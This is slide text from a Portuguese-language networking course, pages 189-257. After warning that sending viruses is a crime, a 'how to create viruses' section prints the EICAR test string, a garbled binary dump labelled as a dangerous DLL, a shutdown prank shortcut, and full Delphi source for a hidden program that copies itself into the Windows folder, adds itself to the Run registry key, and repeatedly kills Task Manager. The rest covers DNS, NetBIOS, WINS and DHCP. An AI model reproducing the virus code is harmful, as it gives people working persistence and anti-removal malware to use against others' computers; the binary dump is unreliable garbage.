Posso enviar um vírus por brincadeira?

Não! Mesmo por brincadeira, enviar um vírus de computador pode configurar crime de dano.

Certifique-se que os anexos transmitidos são arquivos benignos e úteis ao destinatário.

Um vírus pode se propagar de diversas formas. anexo download engenharia social

Código Penal

DanoArt. 163 - Destruir, inutilizar ou deteriorar coisa alheia:Pena - detenção, de um a seis meses, ou multa.

Page 189: 62282591 Senai Curso Avancado Redes

Possíveis danos Perda de desempenho do micro; Exclusão de arquivos; Alteração de dados; Acesso a informações confidenciais por

pessoas não autorizadas; Perda de desempenho da rede (local e

Internet); Monitoramento de utilização (espiões); Desconfiguração do Sistema Operacional. Inutilizarão de determinadas peças.

Page 190: 62282591 Senai Curso Avancado Redes

190

Detectando, prevenindo e combatendo os vírus

Page 191: 62282591 Senai Curso Avancado Redes

191

E os anti-vírus são…

Page 192: 62282591 Senai Curso Avancado Redes

Anti virus em ação

Page 193: 62282591 Senai Curso Avancado Redes

Anti Spywere em ação

Page 194: 62282591 Senai Curso Avancado Redes

194

Como Criar Virus

Page 195: 62282591 Senai Curso Avancado Redes

195

Código de Vírus TesteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-

STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Malicioso (Salvar no Bloco de Nota Vassoura.exe)

AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE...AIL.COM/AMDWIN@*.*

Page 196: 62282591 Senai Curso Avancado Redes

196

Código de Vírus (cont) Ctfmon32.dll Virus Perigoso – Não sai do computador:

MZ€ ÿÿ @ @ € º ´ Í!¸LÍ!This program cannot be run in DOS mode.$ PE L ÎýwE à ! A ” @ P êâ @ N 0 \ @@ .data l @ Ð.text m à.idata \ 0 @ À.edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL ÿÿÿÿÿÿÿÿU‰å‹E ƒøu(‹E£ @ è# ¡@ Àt ÿ5 @ è ¸ ëƒø u è— ¸ ë1ÀÉ U‰åƒìVuøVjh @ ÿ5 @ jÿÿz0@ h‚ @ ÿ‚0@ h @ Pÿ†0@ £ @ ÿuÿuÿuÿuÿu ÿuÿ @ ‰EüVjh @ ÿ5 @ �jÿÿz0@ ^‹EüÉ U‰åƒìVuøVjh2 @ ÿ5. @ jÿÿz0@ h‚ @ ÿ‚0@ hD @ Pÿ†0@ £@ @ ÿuÿuÿuÿuÿu ÿuÿ@ @ ‰EüVjh: @ �ÿ5. @ jÿÿz0@ ^‹EüÉ U‰åƒìVWÿuÿuÿuÿuÿu ÿuèlÿÿÿ‰Eì À…0 ‹}‹Eƒø uG‰Eð‹w ÇEø ÇEü ë ƒø… G‰Eð‹wÇEø � �ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèÏ Àu&‹E £ @ @ÿuÿuÿuÿuPÿuèÕþÿÿ‰Eìéœ ÿuÿuÿuÿuÿ5 @ ÿuè³þÿÿ‰Eì Àua‹Eø� � �‰Eð‹Eü‹4h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèO Àu(¡ @ ;E s‹E @ÿuÿuÿuÿuPÿuèPþÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè4þÿÿ�‰Eì_^‹EìÉ U‰åƒìVWÇEüÿÿÿÿ‹M ‹}¾@ üóf§ ÉuÇEü _^‹EüÉ U‰åƒìVuøVjhW @ ÿ5S @ jÿÿz0@ h‚ @ ÿ‚0@ hi @ �Pÿ†0@ £e @ ÿuÿuÿu ÿuÿe @ ‰EüVjh_ @ ÿ5S @ jÿÿz0@ ^‹EüÉ U‰åƒìVWÿuÿuÿuÿuÿu ÿuèóüÿÿ‰Eì À…0 ‹}‹Eƒø uG ‰Eð‹wÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèËþÿÿ Àu&‹E £Œ @ @ÿuÿuÿuÿuPÿuè\� �üÿÿ‰Eìéœ ÿuÿuÿuÿuÿ5Œ @ ÿuè:üÿÿ‰Eì Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèKþÿÿ Àu(¡Œ @ ;E s‹E �@ÿuÿuÿuÿuPÿuè×ûÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè»ûÿÿ‰Eì_^‹EìÉ U‰åƒì VWÿuÿuÿu ÿuèþÿÿ‰Eôƒø |vƒ}upÇEø ‹} ‹WD; @ u¡ @ ÿ7‰þ7¹ð üó¤Xë݉þ7VEü9þu‹Eø Àt‹GD; @ u ‹uøÇ ë‰}ø‹}ü‹GD; @ u‹uø‹ë½_^‹EôÉ U�‰åƒìVWh‚ @ ÿ‚0@ ‰EühD @ ÿ–0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ–0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ–0@ ‰Á¾ @ ‰÷¬4jªâúhi @ ÿuüÿ†0@ £S @ EøPjhW @ ÿ5S @ jÿÿ~0@ Æ_ @ hÇ` @ /%@ Æd @ ÃEøPjh_ @ ÿ5S @ jÿÿz0@ h @ � �ÿuüÿ†0@ £ @ EøPjh @ ÿ5 @ jÿÿ~0@ Æ @ hÇ @ Ì#@ Æ @ ÃEøPjh @ ÿ5 @ jÿÿz0@ hD @ ÿuüÿ†0@ £. @ EøPjh2 @ � � �ÿ5. @ jÿÿ~0@ Æ: @ hÇ; @ È!@ Æ? @ ÃEøPjh: @ ÿ5. @ jÿÿz0@ _^ÉÃU‰åÿuÿu ÿuj ÿ.1@ 1ÀÉ U‰åƒìEüPjhW @ � �ÿ5S @ jÿÿz0@ EüPjh @ ÿ5 @ jÿÿz0@ EüPjh2 @ ÿ5. @ jÿÿz0@ ÉÃU‰åj ÿ5 @ hN'@ jÿ*1@ jÿÿŽ0@ É U� �‰åVS‹ud¡0 ‹@ ƒÀ ‹ ;puù‹0‹X‰3‹p‹‰s@‹0‹X‰3‹p‹‰s[^É U‰åƒìVW‹u ¿@ f*f Àtf«ëõf«Ç@ ‹E£ @ EüPj j h»'@ j � �j ÿŠ0@ _^É V0 <0 z0 1 J0 *1 KERNEL32.DLL USER32.DLL ž0 ´0 È0 Ü0 î0 þ0 1 1 ž0 ´0 È0 Ü0 î0 þ0 1 1 WriteProcessMemory ReadProcessMemory GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA 61 J1 61 J1 SetWindowsHookExA CallNextHookEx 2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A £0*0·0ì0ò0ú0ÿ01111.191?1G1a1g1o1t1z11†1‹1£1®1´1¼172=2d2”2·2½2á �2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4»4Á4å4e5l5›5·5Ø 5Þ5æ5ì5ó5 66�66 6'646=6B6M6S6[6a6h6l6r6~6„6Œ6‘6š6Ÿ6ª6°6¸6¾6Å6É6Ï6Û6á6é6î6÷6ü67777"7&7,787>7F7^7u7{7ƒ7Ž7”7œ7§7*7µ7Â7Ç7Ï7×7-8@8L8Y8c8

Page 197: 62282591 Senai Curso Avancado Redes

197

Código de Vírus (cont) virus.bat

Criem um atalho e na localização escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas"

T (TEMPO EM SEGUNDOS) Podem mudar

C (Comentário)

Page 198: 62282591 Senai Curso Avancado Redes

198

Virus em Delphi Existe muitas maneiras de criar um virus em

delphi, a maioria dos trojans famosos que circulão n internet foram feitos em delphi.Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del.

Vamos la, Primeiro abra um projeto e coloque na uses "Registry,"

Agora em baixo de "{$R *.dfm}" coloque isso:

Page 199: 62282591 Senai Curso Avancado Redes

199

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); varsKey : string;reg : TRegIniFile;beginif( bRunOnce )thenbeginsKey := 'Once'endelsebeginsKey := '';end;reg := TRegIniFile.Create( '' );reg.RootKey := HKEY_LOCAL_MACHINE;reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine );reg.Free;end;

Agora no FormCreate coloque isso:

procedure TForm1.FormCreate(Sender: TObject);beginApplication.ShowMainForm := False;CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True);RunOnStartup('virus','C:\WINDOWS\virus.exe',true);end;

Page 200: 62282591 Senai Curso Avancado Redes

200

Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte:

unit Unit1; interface usesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, TLHelp32, PsAPI, ExtCtrls; typeTForm1 = class(TForm)Timer1: TTimer;procedure Timer1Timer(Sender: TObject);procedure FormCreate(Sender: TObject);private{ Private declarations }public{ Public declarations }end; varForm1: TForm1; implementation {$R *.dfm} function TerminarProcesso(sFile: String): Boolean;varverSystem: TOSVersionInfo;hdlSnap,hdlProcess: THandle;bPath,bLoop: Bool;peEntry: TProcessEntry32;arrPid: Array [0..1023] of DWORD;iC: DWord;k,iCount: Integer;arrModul: Array [0..299] of Char;hdlModul: HMODULE;beginResult := False;if ExtractFileName(sFile)=sFile thenbPath:=falseelsebPath:=true;verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);GetVersionEx(verSystem);if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS thenbeginhdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);peEntry.dwSize:=Sizeof(peEntry);bLoop:=Process32First(hdlSnap,peEntry);while integer(bLoop)<>0 dobeginif bPath thenbeginif CompareText(peEntry.szExeFile,sFile) = 0 thenbeginTerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);Result := True;end;endelsebeginif CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 thenbeginTerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);Result := True;end;end;

bLoop := Process32Next(hdlSnap,peEntry);end;CloseHandle(hdlSnap);endelseif verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT thenbeginEnumProcesses(@arrPid,SizeOf(arrPid),iC);iCount := iC div SizeOf(DWORD);for k := 0 to Pred(iCount) do

beginhdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]);if (hdlProcess<>0) thenbeginEnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC);GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul));if bPath thenbeginif CompareText(arrModul,sFile) = 0 thenbeginTerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);Result := True;end;endelsebeginif CompareText(ExtractFileName(arrModul),sFile) = 0 thenbeginTerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);Result := True;end;end;CloseHandle(hdlProcess);end;end;end;end;

procedure TForm1.Timer1Timer(Sender: TObject);beginTerminarProcesso('taskmgr.exe');end; procedure TForm1.FormCreate(Sender: TObject);beginapplication.ShowMainForm := false;end; end.

Page 201: 62282591 Senai Curso Avancado Redes

A Dor do “Blaster” Duas linhas de código C no RPCSS:

– while (*pwszTemp != L'\\')*pwszServerName++ = *pwszTemp++;

Levaram a– >15 milhões de computadores infectados – 3.3M de chamados de suporte em Set. 2003 (volume normal

relacionado a vírus é de 350,000)– Muita repercussão negativa

• “Isto aumentará o nível de frustração ao ponto que várias organizações irão contemplar seriamente alternativas à Microsoft” Gartner Group

• “É realmente recomendado ter cautela aqui. Os esforços [de segurança da Microsoft] foram sinceros, mas não estou certo se foram sinceros o suficiente.” Forrester Research

Page 202: 62282591 Senai Curso Avancado Redes

Em que abordagem você confia ?

Segurança como uma opção

Segurança como um aditivo

Integração extremamente complicada

Não é economicamente viável

Não pode focar na principal prioridade

Segurança como parte do sistema

Segurança Embutida na Rede

Colaboração inteligente entre os elementos

Visão de sistemas

Foco direto na principal prioridade

Page 203: 62282591 Senai Curso Avancado Redes

EDUCAÇÃO DO USUÁRIO É ESSENCIAL

JOGO DOS ERROS

Page 204: 62282591 Senai Curso Avancado Redes

204

Prática de SegurançaPrática de Segurança

xx

Page 205: 62282591 Senai Curso Avancado Redes

Windows 2003 Server

205

Page 206: 62282591 Senai Curso Avancado Redes

Instalação

206

Page 207: 62282591 Senai Curso Avancado Redes

Instalação

207

Page 208: 62282591 Senai Curso Avancado Redes

Instalação

208

Page 209: 62282591 Senai Curso Avancado Redes

Instalação

209

Page 210: 62282591 Senai Curso Avancado Redes

Instalação 2003

210

Page 211: 62282591 Senai Curso Avancado Redes

Introdução a Serviços

211

Page 212: 62282591 Senai Curso Avancado Redes

DNS

212

Page 213: 62282591 Senai Curso Avancado Redes

DNS - Domain Name Service Padrão Aberto para Resolução de

Nomes Hierárquicos– Agrupa nomes em domínios.– A árvore de nomes é armazenada num

banco de dados distribuídobanco de dados distribuído. Especificações do DNS

– RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.• Expecificações da Internet Task Force

– Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley

University para a versão 4.3 SD Unix

Page 214: 62282591 Senai Curso Avancado Redes

Serviço DNS

Nome?

Nome?

Serviço DNS

um ou mais servidores armazenam um banco de dados distribuídos

IP

IPB

Servidor DNS

Page 215: 62282591 Senai Curso Avancado Redes

Nome de Domínio Os nomes Hierárquicos utilizados pelo DNS

são chamados FQDN: – Fully Qualified Domain Name

Exemplo:– www.pucpr.br– www: nome do host– pucpr: nome de domínio– br: nome de domínio

Nome de domínio:– Coleção de HOSTS ou de outros domínios.

Page 216: 62282591 Senai Curso Avancado Redes

Árvore de nomesbr

pucpr

www

ufpr

ppgia

br

PucprUfprwww

ppgia www

FOLHA

RAIZ

www

Page 217: 62282591 Senai Curso Avancado Redes

Banco de Dados Distribuídos No serviço DNS, os nomes estão armazenados em ZONAS. Zonas são arquivos textos que contém os nomes de um ou mais domínios.

br

pucpr

www

ufpr

www

RAIZ

www

ppgia

ZONA .br

ZONA ufpr.brZONA pucpr.br

Page 218: 62282591 Senai Curso Avancado Redes

Banco de Dados Distribuídos Cada Zona pode ser armazenada num servidor DNS distinto.

br

pucpr

www

ufpr

www

RAIZ

www

ppgia

ZONA .br

ZONA ufpr.brZONA pucpr.br

servidordns.br

servidordns.pucpr.br

servidordns.ufpr.br

Page 219: 62282591 Senai Curso Avancado Redes

Exemplo de arquivo de Zona @ SOA dns.pucpr.br

@ NS dns.pucpr.br

dns.pucpr.br. A 200.17.99.2

www A 200.17.99.2

www.ppgia A 200.17.98.174

ZONA pucpr.br

SOA: START OF AUTHORITY

NS: NAME SERVER

A: HOST

• SOA indica qual o servidor armazena o arquivo de zona

• NS indica qual o servidor que responde pelo domínio.

• Nomes terminados por “.” são absolutos

Page 220: 62282591 Senai Curso Avancado Redes

Exemplos de arquivo de Zona

@ SOA dns.ufpr.br @ NS dns.ufpr.br dns.ufpr.br. A 200.101.0.12 www A 200.101.0.15

ZONA ufpr.br

• @ SOA dns.pucpr.br• @ NS dns.pucpr.br• dns.pucpr.br. A 200.17.99.2• www A 200.17.99.2• www.ppgia A 200.17.98.174

ZONA pucpr.br

• @ SOA dns.br• @ NS dns.br• pucpr NS www dns.ufpr.br• ufpr NS dns.pucpr.br• dns.pucpr A 200.17.99.2• dns.ufpr A 200.101.0.12

ZONA.br

Page 221: 62282591 Senai Curso Avancado Redes

Tipos de Registros no DNS A: Host Adress

– associa um nome a um endereço IP: nome nome IP. IP.

PTR: Point Resource Record– associa um endereço IP a um nome: IP IP

nome.nome. NS: Name Server

– identifica o servidor DNS no domínio. SOA: Start of Authority

– indica que o servidor de DNS é a autoridade para fornecer informações no domínio (authoritativeauthoritative).

Page 222: 62282591 Senai Curso Avancado Redes

Consulta Reversa O cliente fornece um número IP e requisita o nome

correspondente. Os registros que relacionam IPs aos nomes são do

tipo PTR.– Por exemplo, um registro para o endereço IP 10.17.98.31

corresponde a uma entrada DNS no seguinte formato:• 31.98.17.10.in-addr.arpa

Se o endereço IP não estiver contido no domínio local (aquele controlado pelo servidor DNS consultado), o servidor DNS contata o servidor DNS situado num nó superior da árvore.– Este mecanismo de procura seqüencial consultando os

nós superiores é chamado “walking the tree”.

Page 223: 62282591 Senai Curso Avancado Redes

Forwarder Cada servidor DNS possui um arquivo de

configuração que diz:– Lista de zonas que ele armazena– Lista de servidores forwarders

Lista de zonas– Indica a localização física do arquivo

correpondente a cada ZONA. Lista de forwarders

– Um forwarder é um servidor DNS hierarquicamente superior ao servidor corrente.

– Esse servidor recebe as consultas de domínios não armazenados pelo servidor DNS.

Page 224: 62282591 Senai Curso Avancado Redes

Exemplo

forwarders{ 200.17.99.2 }

pucpr.br{ /etc/pucprbr.dns}

Arquivo de configuração do servidor dns.pucpr.br

forwarders{ primeiro forwarder segundo forwarder etc.}zona{ localização}zona{ localização}

Page 225: 62282591 Senai Curso Avancado Redes

Ponteiros NS e Forwarders

br

pucpr

www

ufpr

www

RAIZ

www

ppgia

ZONA .br

ZONA ufpr.brZONA pucpr.br

FORWARDERFORWARDER

NSNS

Page 226: 62282591 Senai Curso Avancado Redes

Consulta Recursiva Graças ao ponteiros NS e FORWARDER qualquer servidor DNS

pode responder por toda a árvore de domínios. A resposta pode ser:

– O mapeamento nome-IP requisitado– Uma mensagem de erro dizendo que o domínio ou host não foi

encontrado.

aa bb cc dd

ufprufprpucprpucpr

.br.br

d.ufpr.br

IP = 200.17.98.174

a.pucpr.br?

IP = 10.17.98.31

RESPOSTA NÃO AUTORITÁRIA SE VIER DA CACHE

RESPOSTA AUTORITÁRIA

1

2 3

45

6

1

2

Page 227: 62282591 Senai Curso Avancado Redes

DNS e a Internet O “root” da árvore de nomes da Internet é

gerenciado pelo Internet Network Information Center (InterNICInterNIC)

InterNIC é o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc. – Provê um serviço de registro de nomes para

os domínios .com, .net, .org, and .edu;– O site do InterNIC é http://www.internic.net

O InterNIC delega a responsabilidade de administrar partes do domínio de nomes para as empresas e organizações conectadas na Internet.

Page 228: 62282591 Senai Curso Avancado Redes

Domínios Gerenciados pelo InterNIC Segundo a nomenclatura adotada na

Internet, o “Domain Name Space“ é dividido em três áreas principais:– Organization Domains:

• 3 caracteres para indicar a atividade da empresa.– .com, .edu, .gov, .int, .mil, .net, .org– .int: organizações internacionais– .mil: organizações militares– .org: organizações não comerciais

– Geographical Domains: • 2 caracteres para identificar o país.

– .br, .fr, .jp, etc.– Reverse domain:

• domínio especial utilizado para associar endereços IP aos nomes.

Page 229: 62282591 Senai Curso Avancado Redes

Exemplo

Gerido pelo InterNIC

.com .org .edu

.pucpr

wwwppgia

rla01

Fully qualified domain name(FQDN)www.pucpr.br

.br

.comGerido pela FAPESP

Gerido pela PUC

Page 230: 62282591 Senai Curso Avancado Redes

ZonasServidor DNS

do Internic

.com .org .edu

.pucpr

wwwppgia

rla01

.br

.comServidor DNS da FAPESP

Servidor DNS da PUC

REGISTRO NS

Page 231: 62282591 Senai Curso Avancado Redes

Tipos de Servidores PrimárioPrimário

– É o servidor autoritário para zona. A inclusão, alterações ou exclusão dos registros da zona são feitas através deste servidor.

– O servidor primário envia uma cópia dos seus arquivos de dados para o servidor secundário através de um processo denominado “zone transfer”“zone transfer”

SecundárioSecundário– Funciona como backup. Apenas lê os arquivos de

dados do servidor primário, e responde as requisições dos clientes quando requisitado.

Caching-OnlyCaching-Only– São servidores DNS que apenas efetuam consultas e

guardam o resultado numa cache e retornam os resultados.

– Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.

Page 232: 62282591 Senai Curso Avancado Redes

DNS - Resumo Vantagens:

– Implementa um mecanismo de nomes hierárquico. • Isto facilita a organização dos nomes em redes de

grande porte.

– O banco de dados que armazena os nomes é distribuído.

• Cada servidor DNS contém informações de zonas específicas, e pode ser administrado separadamente.

– É o mecanismo de nomes adotado na Internet.• Pode ser utilizado para resolver nomes na rede local

(intranet) e na rede Internet.

Desvantagem:– Não é dinâmico.

• É responsabilidade do administrador manter as entradas do arquivo de nomes atualizada.

Page 233: 62282591 Senai Curso Avancado Redes

Netbios

233

Page 234: 62282591 Senai Curso Avancado Redes

Nomes NetBIOS O espaço de nomes NetBIOS é “flat”

– flat = não segmentado– implica que cada nome NetBIOS na rede deve ser

único

Os recursos na rede são identificados por nomes NetBIOS registrados dinâmicamente quando:– o computador é inicializado– serviços são inicializados – usuário se loga.

Nomes NetBIOS tem 16 caracteres de comprimento.– O usuário atribui os 15 primeiros caracteres. – O último caracter é reservado para indentificar o tipo

de recursos.

Page 235: 62282591 Senai Curso Avancado Redes

Nomes Registrados na Estação C:\>nbtstat -n

Endeço-Ip nó: [200.17.98.217] Identificador de escopo: []

Tabela de nomes locais de NetBIOS

Nome Tipo Status ------------------------------------------------------------------------ PPGIA16 <00> UNIQUE Registrado PPGIA16 <20> UNIQUE Registrado MESTRADO <00> GROUP Registrado PPGIA16 <03> UNIQUE Registrado MESTRADO <1E> GROUP Registrado JAMHOUR <03> UNIQUE Registrado

Page 236: 62282591 Senai Curso Avancado Redes

Nomes NetBIOS Podem ser de dois tipos:

– UNIQUE (one owner)• Referenciam um único recurso na rede• Exemplo: uma estação

– GROUP (multiple owner)• Referenciam um conjunto de recursos na rede• Exemplo: nome de domínio, nome de grupo

Alguns exemplos de tipos para identificadores únicos são:– <00> Nome do Computador e do Domíno (ou grupo)– <03> Usuário logado– <20> Serviço de nomes de servidor para

sincronização de arquivos compartilhados

Page 237: 62282591 Senai Curso Avancado Redes

Registro e Resolução de Nomes NetBIOS Os seguintes mecanismos são utilizados

para localizar recursos NetBIOS– NetBIOS name cache– NetBIOS name server - WINS server– IP subnet broadcast– Static LMHOSTS files– Static HOSTS files– DNS servers

Os mecanismos de resolução de nomes do NetBIOS sobre TCP/IP são definidos pelas RFCs 1001 e 1002– de acordo com a estratégia utilizada para resolver

nomes, os computadores são denominados b-node, p-nome, m-node ou h-node.

Page 238: 62282591 Senai Curso Avancado Redes

Resolução de Nomes por BroadCast Resolução de nomes usado broadcast IP fornece um

método dinânico para resolução de endereços.– Datagrama “NetBIOS Name Query” em broadcast

perguntando o nome correspondente ao endereço.– Endereço MAC: FF-FF-FF-FF-FF-FF– Endereço IP: 255.255.255.255

Problemas:– Aumento do tráfego na rede– Não funciona em redes segmentadas por

rotedores• Os recursos localizados em outras redes não

recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.

Page 239: 62282591 Senai Curso Avancado Redes

Extranets = VPN (Virtual Private Networks)

REDE AREDE A REDE BREDE B

IAPO1 IAPO2ACME LAB0101 PPGIA

BROADCAST BROADCAST

NOMES NETBIOS NOMES NETBIOS

Page 240: 62282591 Senai Curso Avancado Redes

Cache com Nomes NetBIOS Cada estação mantém uma tabela com os nomes

NetBIOS mais usados recentemente.

C:\>nbtstat -c Endereço-Ip nó: [200.17.98.217] Identificador de

escopo: []

Tabela de nomes de caches remotas de NetBIOS Nome Tipo Endereço Host

Duração [seg] --------------------------------------------------------------- PPGIA07 <00> UNIQUE 200.17.98.224 20 PPGIA07 <20> UNIQUE 200.17.98.224 600 HAL2001 <00> UNIQUE 10.17.98.31 660

Page 241: 62282591 Senai Curso Avancado Redes

Usando o Arquivo HOSTS O arquivo “hosts” permite relacionar nomes a

IP’s, evitando a resolução por broadcast.– A diretiva #PRE pode ser utilizada para registrar

entradas diretamente na cache. – Neste caso, as entradas são consultadas antes de

qualquer outro mecanismo de resolução:

Exemplos: • 10.17.98.31 hal2001 #pre #coloca a entrada na

cache• 10.17.08.30 PPGIA16 #não coloca na cache

Existe também uma diretiva especial para definir domínios:

• 10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP

Page 242: 62282591 Senai Curso Avancado Redes

SERVIDORES DE NOMES NETBIOS MECANISMO DE RESOLUÇÃO DE NOMES

NETBIOS SEM BROADCAST– Mantém uma tabela que mapeia os endereços IP

com o nome dos computadores. – A tabela é atualizada dinamicamentedinamicamente toda a vez que

uma máquina recebe um novo endereço IP.

Exemplo: WINS: Windows Internet Name Service

O serviço WINS trabalha numa arquitetura cliente-servidor. – WINS Server:

• manipula todos as consultas de nomes.

– WINS Client: • registra seu nome e endereço no servidor WINS.• envia as requisições de nomes para o WINS server.

Page 243: 62282591 Senai Curso Avancado Redes

WINS NÃO USA BROADCAST

REDE AREDE A REDE BREDE B

IAPO1 IAPO2ACME LAB0101 PPGIAWINSSERVER

IP e NOME são fornecidos na inicialização

TABELADINÂMICA REQUEST

REPLY

Page 244: 62282591 Senai Curso Avancado Redes

Características do WINS Ao contrário da resolução de nomes por broadcast, WINS permite

que os nomes sejam resolvidos de maneira transparente através de roteadores.

WINS proxy

replicaçãoWINS enabled

WINS server

WINS serverroteador LINK DE BAIXACAPACIDADE

Non- WINS enabled

Page 245: 62282591 Senai Curso Avancado Redes

Definições WINS Server

– Computador que executa o serviço Windows Internet Name

• Este computador mantem uma base de dados relacionando os nomes e os endereços IP das estações na rede.

– Pode haver mais de um servidor WINS na rede.

Cliente WINS enabled– Estação configurada para resolver nomes pelo WINS.

Cliente Non-WINS enabled– Estação não configurada ou incompatível com o

serviço WINS.

WINS proxy– Estações que acessam o serviço WINS para os

clientes Non-WINS enable.

Page 246: 62282591 Senai Curso Avancado Redes

Múltiplos Servidores WINS A utilização de múltiplos servidores WINS é

aconselhável pois:– permite distribuir a carga de resolução de nomes

• as consultas de nomes feita pelos clientes são ponto-a-ponto.

• O mecanismo de broadcast só é utilizado quando o nome solicitado não é encontrado na base do servidor WINS.

– diminui a possibilidade de interrupção do serviço de nomes

• cada servidor WINS possui uma cópia completa da base de nomes, funcionando como backup dos demais.

• quando um servidor entra em pane, os clientes passam a consultar automaticamente o outro servidor.

Page 247: 62282591 Senai Curso Avancado Redes

WINS NÃO É APROPRIADO PARA INTERNET

Para redes grandes, o WINS é inviável pois:– O número de replicações é muito grande– Cada servidor WINS guarda uma cópia completa de todos os

nomes.

WINS SERVER WINS SERVER

WINS SERVERWINS SERVER

REPLICAÇÃO

Page 248: 62282591 Senai Curso Avancado Redes

Ciclo de Vida dos Nomes NetBIOS

Active(Ativo)

Released(Liberado)

Elimando

O cliente foi desligadoOu o nome foi liberado explicitamente

O prazo de renovação foi esgotado (6 dias)

Não renovado(x dias)

OUTRO COMPUTADOR PODE SOLICITAR O DIREITO DE USAR O NOME

Os nomes NetBIOS são concedidos por empréstimo. Precisam ser renovados periodicamente para que o computador mantenha o nome.

Page 249: 62282591 Senai Curso Avancado Redes

Resolução de Nomes Os mecanismos de resolução de nomes do NetBIOS sobre

TCP/IP são definidos pelas RFCs 1001 e 1002.

– b-node: (broadcast-node) resolvem nomes por broadcast de IP

– p-node: (point-to-point-node) usam um servidor de nomes NetBIOS

– m-node: (mix -node)se b-node falhar tentam p-node.

– h-node: (hybrid-node)se p-node falhar tentam b-node

Em redes microsoft, a configuração do cliente pode ser verificada com o utilitário ipconfig /all.

Page 250: 62282591 Senai Curso Avancado Redes

WINS - Resumo Vantagens:

– Reduz significativamente o número de broadcasts de endereços IP necessários para localizar recursos locais e remotos.

– Permite que clientes resolvam nomes de estações situados em segmentos remotos isolados por roteadores.

– Reduz a necessidade de manter e atualizar os arquivos LMHOSTS.

Desvantagens:– Não implementa um mecanismo de nomes

hierárquico. Isto dificulta a administração de redes de grande porte.

– O banco de dados que armazena os nomes NetBIOS não é distribuído. Cada servidor WINS constitui uma réplica completa do banco de dados de nomes.

– Não é compatível com o serviço de nomes usado na Internet.

Page 251: 62282591 Senai Curso Avancado Redes

DHCP

251

Page 252: 62282591 Senai Curso Avancado Redes

DHCP Dynamic Host Configuration Protocol

– Padrão Industrial Aberto • IETF RFC 1533, 1534, 1541 e 1542.

– IETF: Internet Engineering Task Force – RFC: Request for Comments

– Utilizado para centralizar a administração e configuração de parâmetros TCP/IP numa rede.

– Elimina a necessidade de configurar manualmente os clientes numa rede TCP/IP.

Page 253: 62282591 Senai Curso Avancado Redes

DHCP - Arquitetura Cliente-Servidor

Um computador da rede deve funcionar como servidor DHCP.

REQUEST

REPLY

CLIENTESDHCP

SERVIDORDHCP

Page 254: 62282591 Senai Curso Avancado Redes

Administração de Endereços IP Cada computador numa rede TCP/IP deve ter

um endereço IP único.– O endereço IP identifica a estação e a rede ao qual a

estação pertence.– Quando o computador é movido para outra rede,

seu endereço IP deve refletir esta mudança.

DHCP especifica os seguintes serviços (RFC 1541):– um protocolo para que o servidor DHCP e seus

clientes se comuniquem.• PROTOCOLO BOOTP

– Um método para configura os parâmetros de rede de um host IP:

• IP, máscara, gateway default, servidores de nomes, etc.

Page 255: 62282591 Senai Curso Avancado Redes

ESCOPO DHCP Quando se utiliza DHCP, cada rede local é

caracterizada por um ESCOPO:

PARTE FIXA

MASCARAGATEWAYSERVIDOR DE NOMESOUTRAS ROTASPERÍODO DE EMPRÉSTIMO

PARTE DINÂMICA

RANGE DE IP’S

MESMO VALORPARA TODOS OS HOSTS DO ESCOPO

UM VALOR DIFERENTE PARA CADA HOST DO ESCOPO

Page 256: 62282591 Senai Curso Avancado Redes

Processo de Atribuição

Cliente DHCP

Servidor DHCP

Dhcpdiscover

Dhcpoffer 200.17.98.1

Dhcprequest 200.17.98.1

Dhcpack 200.17.98.1

......Dhcprelease 200.17.98.1

Todas as Todas as mensagens são mensagens são enviadas em enviadas em broadcastbroadcast

255.255.255.0200.17.98.2372 horas

200.17.98.1…200.17.98.254

ESCOPO

Page 257: 62282591 Senai Curso Avancado Redes

